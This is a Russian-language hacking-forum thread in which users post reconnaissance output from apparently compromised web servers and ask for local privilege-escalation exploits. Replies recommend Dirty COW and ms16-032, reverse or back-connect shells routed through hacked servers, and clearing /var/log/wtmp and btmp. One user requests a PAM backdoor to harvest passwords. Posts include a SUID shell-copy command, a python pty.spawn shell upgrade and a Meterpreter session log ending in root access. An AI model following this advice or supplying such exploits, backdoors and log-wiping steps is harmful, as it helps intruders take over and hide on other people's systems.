Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Здравствуйте!! Помогите найти сплоит...
    Code:
    Linux ***** 2.6.32-37-pve #1 SMP Wed Feb 11 10:00:27 CET 2015 i686 GNU/Linux
    Code:
    $ ls -la /boot 2>&1
    total 8
    drwxr-xr-x  2 root root 4096 Nov 11  2010 .
    drwxr-xr-x 24 root root 4096 Nov  9 01:09 ..
    Code:
    $ ls -la --full-time /lib 2>&1
    total 5164
    drwxr-xr-x 10 root root    4096 2013-04-29 14:57:53.000000000 +0400 .
    drwxr-xr-x 24 root root    4096 2016-11-09 01:09:27.096608013 +0400 ..
    lrwxrwxrwx  1 root root      21 2013-04-29 14:57:53.000000000 +0400 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:23.000000000 +0300 i486-linux-gnu
    drwxr-xr-x  3 root root    4096 2010-11-11 17:57:21.000000000 +0300 init
    -rwxr-xr-x  1 root root  113248 2011-01-08 09:59:32.000000000 +0300 ld-2.7.so
    lrwxrwxrwx  1 root root       9 2013-04-29 14:39:24.000000000 +0400 ld-linux.so.2 -> ld-2.7.so
    -rw-r--r--  1 root root    5436 2011-01-08 09:59:33.000000000 +0300 libBrokenLocale-2.7.so
    lrwxrwxrwx  1 root root      22 2013-04-29 14:39:24.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libSegFault.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rw-r--r--  1 root root   24800 2008-04-24 01:22:04.000000000 +0400 libacl.so.1.1.0
    -rw-r--r--  1 root root    9800 2011-01-08 09:59:32.000000000 +0300 libanl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libanl.so.1 -> libanl-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rw-r--r--  1 root root   14744 2009-02-10 13:52:07.000000000 +0300 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rw-r--r--  1 root root   38020 2008-10-13 07:33:35.000000000 +0400 libblkid.so.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1.0 -> libbz2.so.1.0.4
    -rw-r--r--  1 root root   66276 2010-08-18 21:15:26.000000000 +0400 libbz2.so.1.0.4
    -rwxr-xr-x  1 root root 1294572 2011-01-08 09:59:32.000000000 +0300 libc-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libc.so.6 -> libc-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rw-r--r--  1 root root   11024 2004-04-14 02:10:45.000000000 +0400 libcap.so.1.10
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.2 -> libcap.so.2.11
    -rw-r--r--  1 root root   13364 2008-07-26 19:26:50.000000000 +0400 libcap.so.2.11
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcfont.so.0 -> libcfont.so.0.0.0
    -rw-r--r--  1 root root   10712 2008-04-16 01:18:10.000000000 +0400 libcfont.so.0.0.0
    -rw-r--r--  1 root root  185816 2011-01-08 09:59:32.000000000 +0300 libcidn-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libcidn.so.1 -> libcidn-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rw-r--r--  1 root root    8676 2008-10-13 07:33:34.000000000 +0400 libcom_err.so.2.1
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libconsole.so.0 -> libconsole.so.0.0.0
    -rw-r--r--  1 root root   72816 2008-04-16 01:18:10.000000000 +0400 libconsole.so.0.0.0
    -rw-r--r--  1 root root   38296 2011-01-08 09:59:32.000000000 +0300 libcrypt-2.7.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:39:24.000000000 +0400 libcrypt.so.1 -> libcrypt-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libctutils.so.0 -> libctutils.so.0.0.0
    -rw-r--r--  1 root root   17024 2008-04-16 01:18:10.000000000 +0400 libctutils.so.0.0.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root   55052 2006-02-15 01:06:32.000000000 +0300 libdb1-2.2.5.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb1.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root    9680 2011-01-08 09:59:32.000000000 +0300 libdl-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 libdl.so.2 -> libdl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rw-r--r--  1 root root   22912 2008-10-13 07:33:35.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rw-r--r--  1 root root  167900 2008-10-13 07:33:35.000000000 +0400 libext2fs.so.2.4
    -rw-r--r--  1 root root   49676 2008-12-31 15:50:19.000000000 +0300 libgcc_s.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libhistory.so.5 -> libhistory.so.5.2
    -rw-r--r--  1 root root   28032 2009-01-20 18:07:11.000000000 +0300 libhistory.so.5.2
    -rw-r--r--  1 root root    5744 2008-09-01 15:01:21.000000000 +0400 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rw-r--r--  1 root root  149328 2011-01-08 09:59:32.000000000 +0300 libm-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libm.so.6 -> libm-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libmemusage.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7
    -rw-r--r--  1 root root  202188 2008-12-14 23:27:28.000000000 +0300 libncurses.so.5.7
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7
    -rw-r--r--  1 root root  249836 2008-12-14 23:27:29.000000000 +0300 libncursesw.so.5.7
    -rw-r--r--  1 root root   79608 2011-01-08 09:59:32.000000000 +0300 libnsl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libnsl.so.1 -> libnsl-2.7.so
    -rw-r--r--  1 root root   30436 2011-01-08 09:59:32.000000000 +0300 libnss_compat-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.7.so
    -rw-r--r--  1 root root   17880 2011-01-08 09:59:33.000000000 +0300 libnss_dns-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.7.so
    -rw-r--r--  1 root root   38408 2011-01-08 09:59:32.000000000 +0300 libnss_files-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libnss_files.so.2 -> libnss_files-2.7.so
    -rw-r--r--  1 root root   17896 2011-01-08 09:59:32.000000000 +0300 libnss_hesiod-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
    -rw-r--r--  1 root root   76292 2008-11-04 18:09:17.000000000 +0300 libnss_ldap-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libnss_ldap.so.2 -> libnss_ldap-2.7.so
    -rw-r--r--  1 root root   34348 2011-01-08 09:59:33.000000000 +0300 libnss_nis-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.7.so
    -rw-r--r--  1 root root   46600 2011-01-08 09:59:32.000000000 +0300 libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      21 2013-04-29 14:39:24.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpam.so.0 -> libpam.so.0.81.12
    -rw-r--r--  1 root root   40440 2009-03-18 03:03:06.000000000 +0300 libpam.so.0.81.12
    lrwxrwxrwx  1 root root      21 2013-04-29 14:38:23.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.3
    -rw-r--r--  1 root root    8256 2009-03-18 03:03:06.000000000 +0300 libpam_misc.so.0.81.3
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
    -rw-r--r--  1 root root    9144 2009-03-18 03:03:06.000000000 +0300 libpamc.so.0.81.0
    -rw-r--r--  1 root root    5440 2011-01-08 09:59:32.000000000 +0300 libpcprofile.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
    -rw-r--r--  1 root root   33284 2008-06-25 10:27:20.000000000 +0400 libpopt.so.0.0.0
    -rw-r--r--  1 root root   56180 2009-01-12 00:49:28.000000000 +0300 libproc-3.2.7.so
    -rwxr-xr-x  1 root root  112012 2011-01-08 09:59:36.000000000 +0300 libpthread-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libpthread.so.0 -> libpthread-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libreadline.so.5 -> libreadline.so.5.2
    -rw-r--r--  1 root root  200548 2009-01-20 18:07:11.000000000 +0300 libreadline.so.5.2
    -rw-r--r--  1 root root   63312 2011-01-08 09:59:32.000000000 +0300 libresolv-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:39:24.000000000 +0400 libresolv.so.2 -> libresolv-2.7.so
    -rw-r--r--  1 root root   30624 2011-01-08 09:59:32.000000000 +0300 librt-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 librt.so.1 -> librt-2.7.so
    -rw-r--r--  1 root root   95964 2008-09-16 11:38:17.000000000 +0400 libselinux.so.1
    -rw-r--r--  1 root root  215260 2008-07-12 18:51:50.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libslang.so.2 -> libslang.so.2.1.3
    -rw-r--r--  1 root root  683040 2008-03-17 21:50:56.000000000 +0300 libslang.so.2.1.3
    lrwxrwxrwx  1 root root      12 2013-04-29 14:38:23.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rw-r--r--  1 root root   18636 2008-10-13 07:33:34.000000000 +0400 libss.so.2.0
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libsysfs.so.2 -> libsysfs.so.2.0.1
    -rw-r--r--  1 root root   38584 2008-09-06 12:40:51.000000000 +0400 libsysfs.so.2.0.1
    -rw-r--r--  1 root root   26284 2011-01-08 09:59:32.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libtic.so.5 -> libtic.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:28.000000000 +0300 libtic.so.5.7
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libticw.so.5 -> libticw.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:29.000000000 +0300 libticw.so.5.7
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root   29264 2008-09-05 15:21:18.000000000 +0400 libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root    9684 2011-01-08 09:59:32.000000000 +0300 libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libutil.so.1 -> libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rw-r--r--  1 root root   12912 2008-10-13 07:33:34.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rw-r--r--  1 root root   31168 2008-07-26 03:45:03.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libxtables.so.0 -> libxtables.so.0.0.0
    -rw-r--r--  1 root root   18380 2009-02-09 22:52:34.000000000 +0300 libxtables.so.0.0.0
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:28.000000000 +0300 lsb
    drwxr-xr-x  5 root root    4096 2016-01-21 14:15:29.181003302 +0400 modules
    drwxr-xr-x  2 root root    4096 2010-11-11 17:58:14.000000000 +0300 security
    drwxr-xr-x 15 root root    4096 2010-11-11 17:57:27.000000000 +0300 terminfo
    drwxr-xr-x  3 root root    4096 2013-04-29 14:38:26.000000000 +0400 udev
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:51.000000000 +0300 xtables
    Code:
    $ mount 2>&1
    /dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
    proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime,mode=755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
    Code:
    $ df -h 2>&1
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/simfs             50G   36G   15G  71% /
    tmpfs                 1.0G     0  1.0G   0% /lib/init/rw
    tmpfs                 1.0G     0  1.0G   0% /dev/shm
    Code:
    $ cat /etc/issue 2>&1
    Debian GNU/Linux 5.0 \n \l
    Code:
    $ cat /etc/crontab 2>&1
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    12 * * * * root cd / && run-parts --report /etc/cron.hourly
    53 4 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    55 5 30 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    
    Code:
    $ cat /proc/version 2>&1
    Linux version 2.6.32-37-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Wed Feb 11 10:00:27 CET 2015
    Code:
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    4096
    Code:
    $ ls -la /usr/bin/staprun 2>&1
    ls: cannot access /usr/bin/staprun: No such file or directory
     
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Проверяли dirtyc0w?
     
    zifus and t0ma5 like this.
  3. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Да, не подходит
     
  4. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    429
    Likes Received:
    11
    Reputations:
    7
    Linux easymoneyeasylife.org 2.6.32-642.11.1.el6.x86_64 #1 SMP Fri Nov 18 19:25:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

    total 48
    dr-xr-xr-x. 10 root root 4096 2016-12-17 15:45:47.044000005 +0200 .
    dr-xr-xr-x. 22 root root 4096 2016-12-17 15:50:37.719000033 +0200 ..
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:45:47.044000005 +0200 alsa
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:44:55.387000010 +0200 crda
    drwxr-xr-x. 46 root root 12288 2016-12-17 15:46:04.550000005 +0200 firmware
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:44:23.373000005 +0200 kbd
    dr-xr-xr-x. 3 root root 4096 2016-12-17 15:44:36.126000005 +0200 modules
    drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:42:48.750000003 +0200 terminfo
    drwxr-xr-x. 5 root root 4096 2016-12-17 16:17:53.602000064 +0200 udev

    /dev/vda3 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/vda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

    Filesystem Size Used Avail Use% Mounted on
    /dev/vda3 9.3G 1.4G 7.4G 16% /
    tmpfs 371M 0 371M 0% /dev/shm
    /dev/vda1 240M 34M 194M 15% /boot

    CentOS release 6.8 (Final)
    Kernel \r on an \m

    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # | .------------- hour (0 - 23)
    # | | .---------- day of month (1 - 31)
    # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
    # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # | | | | |
    # * * * * * user-name command to be executed

    Linux version 2.6.32-642.11.1.el6.x86_64 ([email protected]2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Fri Nov 18 19:25:05 UTC 2016

    4096

    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun


    -rwsr-xr-x. 1 root root 34904 May 11 2016 /bin/su
    -rwsr-xr-x. 1 root root 36488 May 10 2016 /bin/ping6
    -rwsr-xr-x. 1 root root 53472 Nov 18 17:38 /bin/umount
    -rwsr-xr-x. 1 root root 77336 Nov 18 17:38 /bin/mount
    -rwsr-xr-x. 1 root root 38264 May 10 2016 /bin/ping
    -rwsr-xr-x. 1 root root 70480 May 11 2016 /usr/bin/chage
    -rws--x--x. 1 root root 20184 Nov 18 17:38 /usr/bin/chfn
    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun
    -rwsr-xr-x. 1 root root 51784 Aug 23 21:36 /usr/bin/crontab
    -rws--x--x. 1 root root 20056 Nov 18 17:38 /usr/bin/chsh
    -rwsr-xr-x. 1 root root 54496 Feb 19 2015 /usr/bin/at
    -rwsr-xr-x. 1 root root 75640 May 11 2016 /usr/bin/gpasswd
    -rwsr-xr-x. 1 root root 22544 Mar 17 2015 /usr/bin/pkexec
    -rwsr-xr-x. 1 root root 30768 Nov 23 2015 /usr/bin/passwd
    -rwsr-xr-x. 1 root root 40240 May 11 2016 /usr/bin/newgrp
    ---s--x--x. 1 root root 123832 Dec 7 02:36 /usr/bin/sudo
    -rwsr-xr-x. 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x. 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x. 1 abrt abrt 10296 May 11 2016 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
    -rws--x--x. 1 root root 14280 May 10 2016 /usr/libexec/pt_chown
    -rws--x--x 1 root root 42288 Aug 22 2010 /usr/sbin/userhelper
    -r-s--x--- 1 root apache 13984 Nov 19 01:49 /usr/sbin/suexec
    -rwsr-xr-x. 1 root root 9000 Jul 12 19:40 /usr/sbin/usernetctl
    -rwsr-x--- 1 root dbus 50552 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x. 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check
    -rwsr-xr-x. 1 root root 34840 May 11 2016 /sbin/unix_chkpwd

    Пробовала enlightenment. Результатов не дало(
    Хотя как я поняла там нету компилятора(((
     
    #624 Rastamanka, 17 Dec 2016
    Last edited: 17 Dec 2016
  5. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Скажите а с таким пользователем 33 ( www-data ) Group: 33 ( www-data ) можно запускать баш команды? Для выполнения эксплоита!
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ты сначала проверь наличие gcc< perl< python на чем там твой сплоит, все зависит от настройки сервера
     
  7. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    gcc нет на сервере, перл питон есть! Dirty COW хочу попробовать
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну так сначала бэк коннект замути, так что бы консоль была, а дальше дерзай, из всо у меня не всегда получалось , пробовал сторонний перл скрипт на открытие порта и коннекта к своей машине, как консоль откроешьЮ пробуй уже все варианты, про безопасность не забывай
     
  9. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    316
    Likes Received:
    22
    Reputations:
    0
    Ребята, подскажите какие эксплойты можно попробовать на windows server 2003 sp2 r2 (точно не знаю есть ли там r2), винда 32 битная.
    На 7 нашел ms16-032 powershell скрипт, на 7 64 битной выдал права. Но проблема в том, что 2003 машина не имеет еще powershell, можно ли без прав админа как-то портабельно поставить ее туда или только переписывать код на с++, c# ?
    Кстати может кто посоветовать подборку эксплойтов для повышения привелегий в 2003 сервере 32 битном.
     
  10. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Реализация на C#
    https://www.exploit-db.com/exploits/39809/
     
  11. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
  12. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    Code:
    char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
    Где эксплойт?
    Запустить из /tmp копию исполняемого файла sh, претендующего на шелл?
     
  13. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    Парни приветсвую. Есть фря 10.2, 2015 года.

    Есть ли сплоит под нее? Есть может кто сможет помочь с POC довести до боевого сплоита?

    https://cturt.github.io/sendmsg.html


    И еще, подскажите какойнить рутки\PAM бекдор(для linux уже) что бы собрать пароли которые вводятся при входе, да и принимало "мастер" пасс
     
  14. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Парни, подскажите по ситуации:
    есть сработавший Dirty CoW.
    Подключен через netcat. Соответственно юзера сменить не могу. через su или login.
    expect не установлен.

    Шо робити?)
     
  15. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    Используй бекконект с tty (к примеру python-pty-shells-master ,тогда сможешь пользователя сменить) Либо подключайся по ssh. не забудь почистить
    /var/log/wtmp /var/log/btmp
     
  16. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Так, народ, требую вашей помощи ибо всего навалилось и мозг опух... Вопросов будет несколько, они покажутся вам нубскими, но мне похуй лучше показаться тупым, но узнать, чем не узнать.

    1 - бэк-коннект. Для этого нужен выделенный IP адрес, верно? Если его нету, но используется VPN бэк-коннект возможен?
    2 - бинд-порт. Вроде бы понятно. но как забиндить порт для TTY сессии? верней заспаунить TTY сессию, которая подождет пока я к ней подключюсь.
    3 - бинарный шелл. если есть машина, где не компилится ничего, и вообще админ - уебок и не работает половина функций, то вроде как, ко слухам, можно запусть ./bind_port бинарник и он забиндит порт, т.к. ип у меня не выделенный, предварительно скомпилировав этот самый бинарник либо на подобной конфигурации либо используя msfvenom. ЭТО ТАК?!
    4 - чем потом к этому порту подключатся? я серьезно блять чем?? netcat не подходит вроде?


    это и так понятно.
    есть конкретные условия. И да, ломаный дедик в сомали не поможет с TTY



    Хуй с ним, разобрался сам.
    1 - нет
    2 - нихуя не разобрался
    3 и 4
    вот гайд http://netsec.ws/?p=331


    так, а теперь новые вопросы в студию, для вас от меня:
    [*] Meterpreter session 3 opened (*****:45835 -> *****:3443) at 2017-03-15 16:07:22 -0600
    meterpreter > shell
    su firefart
    su: must be run from a terminal
    sudo su
    sudo: no tty present and no askpass program specified

    на сколько я понял адмие ебнулся и отключил TTY? это вообще блять нормально?!

    вапрiс: как перелогинится из www-data без прав в firefart с правави root?

    p.s. сори за емоции, реально трудный день...
     
    #636 ACat, 15 Mar 2017
    Last edited: 16 Mar 2017
  17. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    170
    Likes Received:
    99
    Reputations:
    2
    1) можно бек коннектица на ломаный дедик с выделенным ip
    или vps сервер в Сомали
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    firefart@rz ~ # id
    uid=0(firefart) gid=0(root) groups=0(root)
    помог ssh

    но вопрос остался без ответа
     
  19. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Бэк возможен при прямом доступе к реверс-серверу напрямую. VPN роли не играет. Возможно использование туннелей, популярный сервис: https://ngrok.com/
    Биндить порт нужно для какого-нибудь листенера. Обычно используются популярные шеллкоды, в которых идет проброс в cmd и прочую нечисть. Удобные инструменты: netcat, socat.
    бинарный шелл - это что-то смешное, так не говорят. Поднять можно что угодно.
    Какой листенер, таким клиентом и подключаться. Забиндил на vnc - подключайся vnc клиентом.

    Там ничего не отключили.
    spawn через python:
    Code:
    python -c 'import pty; pty.spawn("/bin/sh")'
     
    _________________________
    eminlayer7788, ACat and Gorev like this.
  20. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Спасибо!
    Сейчас нет возможности, но в ближайшем времени доберусь до сервера и попробую, как Вы посоветовали. Отпишусь в этом посте.


    Фак май моск, сработало!!!
    Вы красава, Вам плюсик :3
     
    #640 ACat, 16 Mar 2017
    Last edited: 17 Mar 2017